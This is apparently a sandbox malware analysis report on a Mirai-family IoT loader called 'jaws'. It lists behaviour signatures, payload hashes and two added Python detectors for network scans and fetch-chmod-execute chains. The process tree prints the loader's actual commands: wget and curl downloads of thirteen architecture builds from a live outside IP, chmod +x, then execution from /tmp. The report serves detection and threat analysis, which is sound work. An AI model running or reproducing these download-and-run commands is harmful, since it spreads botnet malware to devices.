Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    30-08-2024 05:17

General

  • Target

    jaws

  • Size

    3KB

  • MD5

    4429a8d8a1c145c7f2135f7b93910618

  • SHA1

    f4a829f7fe5f475e1fc63661218303e41779de65

  • SHA256

    5f146a25218b14546812329e55b5d4b8b0e4b1caf182e4681295efa2d461b0cf

  • SHA512

    5c486e279036afbf60f6c1737141f9613f748bc8b2f6f493b10b7e69556f6df4cb2fe8c2f20846bba5ac46337bc08109cb9f0e81db7ff267a2aed2242c0affc5

Malware Config

Extracted

Family

mirai

Botnet

UNSTABLE

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Contacts a large number (145784) of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Executes dropped EXE 13 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware such as Mirai modifies the hardware watchdog to prevent it from restarting the infected system.

  • UPX packed file 5 IoCs

    Detects executables packed with UPX or a modified build of the open-source UPX packer.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Writes file to system bin folder 1 TTPs 2 IoCs
  • Changes its process name 1 IoCs
  • Reads runtime system information 57 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 23 IoCs

    Malware often drops required files in the /tmp directory.
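
The two scan-related signatures above are fan-out heuristics: one source touching an unusually large number of distinct destinations, usually on one or two ports, inside a short window. The following is an added example, not part of this report and not Triage's own detection logic, of that heuristic applied to constructed flow records. The thresholds (100 distinct hosts within 60 s, 80% of flows to a single port), the 192.0.2.x / 10.0.0.x / 198.51.100.x addresses, and the choice of TCP 23 and 2323 for the simulated scanner (Mirai's classic telnet targets, which this report does not itself state) are all assumptions. The third constructed host shows why the window matters: it contacts 150 distinct servers, but spread over ten minutes, and must not be flagged.

```python
import random
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float     # seconds since start of capture
    src: str
    dst: str
    dport: int


def max_fanout(flows, window=60.0):
    """Per source: the largest number of distinct destinations contacted inside
    any `window`-second span. Sliding window over the time-sorted flows, so a
    host that slowly talks to many peers over an hour is not confused with a
    scanner that hits them all in seconds."""
    per_src = defaultdict(list)
    for f in flows:
        per_src[f.src].append(f)
    result = {}
    for src, fl in per_src.items():
        fl.sort(key=lambda f: f.ts)
        in_window, best, left = Counter(), 0, 0
        for f in fl:
            in_window[f.dst] += 1
            while f.ts - fl[left].ts > window:      # drop flows that aged out
                old = fl[left].dst
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            best = max(best, len(in_window))
        result[src] = best
    return result


def port_concentration(flows):
    """Per source: share of its flows aimed at its single most-used port.
    Scanners probe one or two service ports; ordinary clients spread out."""
    by_src = defaultdict(Counter)
    for f in flows:
        by_src[f.src][f.dport] += 1
    return {src: c.most_common(1)[0][1] / sum(c.values()) for src, c in by_src.items()}


def classify(flows, host_threshold=100, window=60.0, port_share=0.8):
    """Flag a source as scanning when it reaches host_threshold distinct
    destinations inside one window AND most of its flows go to one port.
    Thresholds are assumptions, not values taken from the report."""
    fan = max_fanout(flows, window)
    conc = port_concentration(flows)
    out = {}
    for src in fan:
        is_scan = fan[src] >= host_threshold and conc[src] >= port_share
        out[src] = {"distinct_hosts": fan[src],
                    "top_port_share": round(conc[src], 2),
                    "verdict": "scan" if is_scan else "normal"}
    return out


def build_sample():
    """Constructed flows (not from the report): one scanner, one ordinary
    client, and one busy-but-slow client that must NOT be flagged."""
    rng = random.Random(1)
    flows = []
    # 192.0.2.10: 600 SYNs in 30 s to random hosts, 9 in 10 on TCP 23, rest 2323
    for i in range(600):
        dst = "%d.%d.%d.%d" % (rng.randrange(11, 200), rng.randrange(256),
                               rng.randrange(256), rng.randrange(1, 255))
        flows.append(Flow(i * 0.05, "192.0.2.10", dst, 23 if i % 10 else 2323))
    # 192.0.2.20: 100 flows over 60 s to 10 internal servers on mixed ports
    for i in range(100):
        flows.append(Flow(i * 0.6, "192.0.2.20", "10.0.0.%d" % (i % 10 + 1),
                          (443, 443, 80, 53)[i % 4]))
    # 192.0.2.30: 150 distinct HTTPS hosts, but spread evenly over 10 minutes
    for i in range(150):
        flows.append(Flow(i * 4.0, "192.0.2.30", "198.51.100.%d" % (i + 1), 443))
    return flows


if __name__ == "__main__":
    for src, verdict in sorted(classify(build_sample()).items()):
        print(src, verdict)
```

On real data the per-source counters would be fed from NetFlow/IPFIX or Zeek conn logs rather than an in-memory list, and the host threshold should be set from a baseline of the network's normal fan-out; the structure of the check stays the same.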

Processes

  • /tmp/jaws
    /tmp/jaws
    1⤵
    • Writes file to tmp directory
    PID:709
    • /usr/bin/wget
      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.x86
      2⤵
      • Writes file to tmp directory
      PID:712
    • /usr/bin/curl
      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:730
    • /bin/cat
      cat h0r0zx00x.x86
      2⤵
      PID:736
    • /bin/chmod
      chmod +x h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
      2⤵
      PID:737
    • /tmp/hiroz3x
      ./hiroz3x jaws.exploit
      2⤵
      • Executes dropped EXE
      PID:739
    • /usr/bin/wget
      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips
      2⤵
      • Writes file to tmp directory
      PID:741
    • /usr/bin/curl
      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:742
    • /bin/cat
      cat h0r0zx00x.mips
      2⤵
      PID:743
    • /bin/chmod
      chmod +x h0r0zx00x.mips h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
      2⤵
      PID:744
    • /tmp/hiroz3x
      ./hiroz3x jaws.exploit
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Changes its process name
      • Reads runtime system information
      PID:745
    • /usr/bin/wget
      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mpsl
      2⤵
      • Writes file to tmp directory
      PID:748
    • /usr/bin/curl
      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mpsl
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:753
    • /bin/cat
      cat h0r0zx00x.mpsl
      2⤵
      PID:754
    • /bin/chmod
      chmod +x h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
      2⤵
      PID:755
    • /tmp/hiroz3x
      ./hiroz3x jaws.exploit
      2⤵
      • Executes dropped EXE
      PID:756
    • /usr/bin/wget
      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm
      2⤵
      • Writes file to tmp directory
      PID:758
    • /usr/bin/curl
      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:759
    • /bin/cat
      cat h0r0zx00x.arm
      2⤵
      PID:767
    • /bin/chmod
      chmod +x h0r0zx00x.arm h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
      2⤵
      PID:769
    • /tmp/hiroz3x
      ./hiroz3x jaws.exploit
      2⤵
      • Executes dropped EXE
      PID:770
    • /usr/bin/wget
      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm5
      2⤵
      • Writes file to tmp directory
      PID:773
    • /usr/bin/curl
      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm5
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:780
    • /bin/cat
      cat h0r0zx00x.arm5
      2⤵
      PID:788
    • /bin/chmod
      chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
      2⤵
      PID:789
    • /tmp/hiroz3x
      ./hiroz3x jaws.exploit
      2⤵
      • Executes dropped EXE
      PID:791
    • /usr/bin/wget
      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm6
      2⤵
      • Writes file to tmp directory
      PID:794
    • /usr/bin/curl
      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm6
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:803
    • /bin/cat
      cat h0r0zx00x.arm6
      2⤵
      PID:813
    • /bin/chmod
      chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
      2⤵
      PID:814
    • /tmp/hiroz3x
      ./hiroz3x jaws.exploit
      2⤵
      • Executes dropped EXE
      PID:816
    • /usr/bin/wget
      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm7
      2⤵
      • Writes file to tmp directory
      PID:819
    • /usr/bin/curl
      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm7
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:822
    • /bin/cat
      cat h0r0zx00x.arm7
      2⤵
      PID:823
    • /bin/chmod
      chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
      2⤵
      PID:824
    • /tmp/hiroz3x
      ./hiroz3x jaws.exploit
      2⤵
      • Executes dropped EXE
      PID:825
    • /usr/bin/wget
      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.ppc
      2⤵
      • Writes file to tmp directory
      PID:827
    • /usr/bin/curl
      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.ppc
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:828
    • /bin/cat
      cat h0r0zx00x.ppc
      2⤵
      PID:829
    • /bin/chmod
      chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
      2⤵
      PID:830
    • /tmp/hiroz3x
      ./hiroz3x jaws.exploit
      2⤵
      • Executes dropped EXE
      PID:831
    • /usr/bin/wget
      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.m68k
      2⤵
      PID:833
    • /usr/bin/curl
      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.m68k
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:834
    • /bin/cat
      cat h0r0zx00x.m68k
      2⤵
      PID:835
    • /bin/chmod
      chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
      2⤵
      PID:836
    • /tmp/hiroz3x
      ./hiroz3x jaws.exploit
      2⤵
      • Executes dropped EXE
      PID:837
    • /usr/bin/wget
      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.spc
      2⤵
      PID:838
    • /usr/bin/curl
      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.spc
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:860
    • /bin/cat
      cat h0r0zx00x.spc
      2⤵
      PID:871
    • /bin/chmod
      chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws
      2⤵
      PID:872
    • /tmp/hiroz3x
      ./hiroz3x jaws.exploit
      2⤵
      • Executes dropped EXE
      PID:873
    • /usr/bin/wget
      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.i686
      2⤵
      • Writes file to tmp directory
      PID:876
    • /usr/bin/curl
      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.i686
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:877
    • /bin/cat
      cat h0r0zx00x.i686
      2⤵
      PID:878
    • /bin/chmod
      chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.i686 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws
      2⤵
      PID:879
    • /tmp/hiroz3x
      ./hiroz3x jaws.exploit
      2⤵
      • Executes dropped EXE
      PID:880
    • /usr/bin/wget
      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.sh4
      2⤵
      PID:882
    • /usr/bin/curl
      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.sh4
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:883
    • /bin/cat
      cat h0r0zx00x.sh4
      2⤵
      PID:884
    • /bin/chmod
      chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.i686 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.sh4 h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws
      2⤵
      PID:885
    • /tmp/hiroz3x
      ./hiroz3x jaws.exploit
      2⤵
      • Executes dropped EXE
      PID:886
    • /usr/bin/wget
      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arc
      2⤵
      PID:887
    • /usr/bin/curl
      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arc
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:888
    • /bin/cat
      cat h0r0zx00x.arc
      2⤵
      PID:889
    • /bin/chmod
      chmod +x h0r0zx00x.arc h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.i686 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.sh4 h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws
      2⤵
      PID:890
    • /tmp/hiroz3x
      ./hiroz3x jaws.exploit
      2⤵
      • Executes dropped EXE
      PID:891
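
The process tree above is the entire loader on one screen. For each of thirteen architecture builds (x86, mips, mpsl, arm, arm5, arm6, arm7, ppc, m68k, spc, i686, sh4, arc) the script fetches the payload twice, once with wget and once with curl -O, so that it works on devices that ship only one of the two; runs cat on the downloaded file, consistent with copying it to the fixed name hiroz3x (a shell redirect would not appear in the recorded argv); marks the staged files executable; and runs ./hiroz3x jaws.exploit, leaving the kernel to reject every build that does not match the host CPU. Only the mips round (PID 745) shows the watchdog, /bin-write and process-rename behaviour, consistent with that being the one build the MIPS sandbox could actually run. The following is an added example, not part of this report and not Triage tooling, that detects this fetch -> chmod +x -> execute-from-/tmp chain in a list of process events and pulls the IOCs out of it. The event records are constructed from the report's first three rounds plus a benign control shell; the field layout (pid, ppid, exe, argv), the pid-1 parent of the root processes, the benign URL, and the three-architecture minimum are assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Payload name suffixes that select a build per CPU architecture; the thirteen
# seen in the process tree above.
ARCH_SUFFIXES = {"x86", "mips", "mpsl", "arm", "arm5", "arm6", "arm7", "ppc",
                 "m68k", "spc", "i686", "sh4", "arc"}
DROP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")   # world-writable staging dirs
MIN_ARCHS = 3   # assumption: fewer distinct builds is not a multi-arch loader


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    exe: str     # resolved path of the image that was executed
    argv: list


@dataclass
class LoaderReport:
    hosts: set = field(default_factory=set)
    urls: list = field(default_factory=list)
    archs: list = field(default_factory=list)        # in fetch order
    staged: set = field(default_factory=set)         # names passed to chmod +x
    executions: list = field(default_factory=list)   # (exe, argv) of staged files run
    verdict: str = "benign"


def _basename(path):
    return path.rsplit("/", 1)[-1]


def analyze(events):
    """Group children by parent and, per parent, walk them in pid order looking
    for the fetch -> chmod +x -> execute-from-a-drop-dir chain. Returns
    {ppid: LoaderReport}; one report per parent keeps unrelated processes
    (an admin's shell that happens to curl something) out of the verdict."""
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev.ppid].append(ev)
    reports = {}
    for ppid, kids in by_parent.items():
        rep = LoaderReport()
        for ev in sorted(kids, key=lambda e: e.pid):   # sandbox emits in exec order
            tool = _basename(ev.exe)
            if tool in ("wget", "curl"):
                for arg in ev.argv[1:]:
                    if arg.startswith(("http://", "https://")):
                        u = urlparse(arg)
                        rep.urls.append(arg)
                        rep.hosts.add(u.hostname)
                        suffix = _basename(u.path).rsplit(".", 1)[-1]
                        if suffix in ARCH_SUFFIXES and suffix not in rep.archs:
                            rep.archs.append(suffix)
            elif tool == "chmod" and "+x" in ev.argv:
                rep.staged.update(_basename(a) for a in ev.argv[ev.argv.index("+x") + 1:])
            elif ev.exe.startswith(DROP_DIRS) and _basename(ev.exe) in rep.staged:
                rep.executions.append((ev.exe, list(ev.argv)))
        if len(rep.archs) >= MIN_ARCHS and rep.executions:
            rep.verdict = ("multi-arch loader: %d builds fetched from %s, %d executions of staged files"
                           % (len(rep.archs), ", ".join(sorted(rep.hosts)), len(rep.executions)))
        reports[ppid] = rep
    return reports


def flagged(reports):
    """Parent pids whose children form a loader chain."""
    return sorted(p for p, r in reports.items() if r.verdict != "benign")


BASE = "http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x."


def build_sample_events():
    """Constructed events: the report's x86, mips and arm rounds under the
    /tmp/jaws root (PID 709), plus a benign control shell (PID 1000, constructed)
    that downloads one file and never makes it executable."""
    events = [ProcEvent(709, 1, "/tmp/jaws", ["/tmp/jaws"])]
    fetched = []
    for arch, (w, c, ca, ch, ex) in (("x86", (712, 730, 736, 737, 739)),
                                     ("mips", (741, 742, 743, 744, 745)),
                                     ("arm", (758, 759, 767, 769, 770))):
        fetched.append("h0r0zx00x." + arch)
        events += [
            ProcEvent(w, 709, "/usr/bin/wget", ["wget", BASE + arch]),
            ProcEvent(c, 709, "/usr/bin/curl", ["curl", "-O", BASE + arch]),
            ProcEvent(ca, 709, "/bin/cat", ["cat", "h0r0zx00x." + arch]),
            ProcEvent(ch, 709, "/bin/chmod", ["chmod", "+x"] + sorted(fetched) + ["hiroz3x", "jaws"]),
            ProcEvent(ex, 709, "/tmp/hiroz3x", ["./hiroz3x", "jaws.exploit"]),
        ]
    events += [
        ProcEvent(1000, 1, "/bin/bash", ["bash"]),
        ProcEvent(1001, 1000, "/usr/bin/curl", ["curl", "-O", "https://example.invalid/notes.txt"]),
    ]
    return events


if __name__ == "__main__":
    reports = analyze(build_sample_events())
    for ppid in flagged(reports):
        r = reports[ppid]
        print("parent pid %d: %s" % (ppid, r.verdict))
        print("  archs:", r.archs)
        print("  urls:", *r.urls, sep="\n    ")
        print("  executions:", [argv for _, argv in r.executions])
```

The chain is keyed on the parent pid rather than on file names on purpose: the payload name (h0r0zx00x), the staging name (hiroz3x) and the argument (jaws.exploit) change from campaign to campaign, while fetch-then-chmod-then-run-from-a-drop-directory under one parent is the shape every such loader has to keep.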

Network

MITRE ATT&CK Enterprise v15

Downloads

The path /tmp/hiroz3x is listed several times with different sizes and hashes: the loader overwrites it with each architecture's payload in turn before running it, so each entry below is a different build.

  • /tmp/h0r0zx00x.x86

    Filesize

    30KB

    MD5

    01b5ca96006efd6ecba70995ac395db5

    SHA1

    c077939743bbdc1906b9cbd291e9e3c15b2ed613

    SHA256

    e68a0410f0139792d1c821e2d577323eb034b2a030dfc5d8cc8b6215c2a933ec

    SHA512

    7cbd89a82ab3ed0ed257cfbbb6a85b27d7a8e7af08c436a5d7104969e23269ad905d8551a1144116b950308daebc90f3515002aadcf65bff754e045714bbec44

  • /tmp/hiroz3x

    Filesize

    32KB

    MD5

    37942437a545b634350c1b0b80d8371f

    SHA1

    deac7b16e9b9e718cc21de900f8e2e78ec6b41a7

    SHA256

    805d483543b0940b25147f18257251a4c24ad857c65bb1286f9f794fa1643bbd

    SHA512

    ba8cbe1e6744b2c6e5136ed739725988410ec0c259cfd89281b0c87c3bc4b3dd3fd15b2541a23953348a5305373f3fdbc02491ebaa6a64a8264d20f19f064fa0

  • /tmp/hiroz3x

    Filesize

    33KB

    MD5

    7e03a4fa6e42aa482775fe8fc656eb29

    SHA1

    68c1aec948d144ec9a2befedaeea0007b96bf8cf

    SHA256

    f78f0bd098b133e70ee11e717bcb53430bc23c499942087473044d5dabe2ca01

    SHA512

    3ba610f23ec82d6c6804e21b2625fa963e7187a9e750a16372154b3bb40743042dab1248c676b638ecc3db4d608bf19193f66a848e69e3a70a2076f084f2d2e2

  • /tmp/hiroz3x

    Filesize

    31KB

    MD5

    4568999226a40c97956934d7f3b623ed

    SHA1

    58cdfc30ccf6a12dec1dd929cbf3ceecece43d42

    SHA256

    96abb7f10850173a8c7b4583e49d092a51d53c9bf863aca9162f14a934e7548e

    SHA512

    77f728e4fa5a8c6fdcbbf6c34ea4987e4c1912da8bfd060d1dc7e639a0415f923984fca3079a87ee792d5e5817bddfeb9be02eda45c9d4c870a4c9de2e6e07c6

  • /tmp/hiroz3x

    Filesize

    27KB

    MD5

    f5129e69c2a10c4ff4ff731d42ee5bed

    SHA1

    a975cfe7e1e8c66b592d6e33c99a288738243980

    SHA256

    7128b3640bac18912378cff5bfbead8a0ff169ef0dfd7ad9c16f79aa3d08ae4a

    SHA512

    3fe57d032eed36553f39b99ca42ba77e30010626e9789a583eab3a417f13fa329a2479b3f2854b518a3a59098887e37f4e184c331539d72046925ad3afdead70

  • /tmp/hiroz3x

    Filesize

    54KB

    MD5

    8b19337d006d6fdc4e59c330efdaf6f9

    SHA1

    e65b4fe930c51c7b56418cf9f713350524ee0f88

    SHA256

    f0353e4f5b1447dbe82d3c056cb3701ad53473e4901fe79a7b42f20425f1c080

    SHA512

    a86486b02b5c7e68dbe2f33364d75e208ede183cbc53ec0161d09444216f2d539305ae24fa58f9af41d2a0bc036da2023836e6db40f13ccc79d6cdf40067f888